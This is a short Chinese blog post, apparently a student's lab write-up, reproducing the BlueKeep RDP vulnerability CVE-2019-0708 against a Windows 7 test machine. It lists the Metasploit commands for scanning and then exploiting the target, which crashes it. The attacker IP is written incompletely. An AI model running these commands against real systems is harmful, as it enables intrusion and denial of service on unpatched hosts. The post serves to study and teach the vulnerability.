CVE-2019-0708漏洞复现

✅作者简介：CSDN内容合伙人、信息安全专业在校大学生
系列专栏 ：内网安全-漏洞复现
新人博主 ：欢迎点赞收藏关注，会回访！
舞台再大，你不上台，永远是个观众。平台再好，你不参与，永远是局外人。能力再大，你不行动，只能看别人成功！没有人会关心你付出过多少努力，撑得累不累，摔得痛不痛，他们只会看你最后站在什么位置，然后羡慕或鄙夷。

---

简介

Windows系列服务器于2019年5月15号，被爆出高危漏洞，该漏洞影响广，windows2003、windows2008、windows2008 R2、windows xp、windows7系统都会遭到攻击，该服务器漏洞利用方式是通过远程桌面端口3389，RDP协议进行攻击的。这个漏洞是2019年来说危害严重性最大的漏洞，跟之前的勒索，永恒之蓝病毒差不多。
CVE-2019-0708漏洞是通过检查用户的身份认证，导致可以绕过认证，不用任何的交互，直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。如果被攻击者利用，会导致服务器入侵，中病毒，像WannaCry永恒之蓝漏洞一样大规模的感染。

实验环境

攻击机 kali IP：192.168.128
靶机 win7 IP：192.168.204.160

漏洞复现

打开kali攻击机进入matesploit，搜索该漏洞

search cve:cve-2019-0708

使用辅助模块

use 0
show options

set rhost 192.168.204.160
run

使用攻击模块

use 1
show options

set rhost 192.168.204.160
set target 1
run

目标蓝屏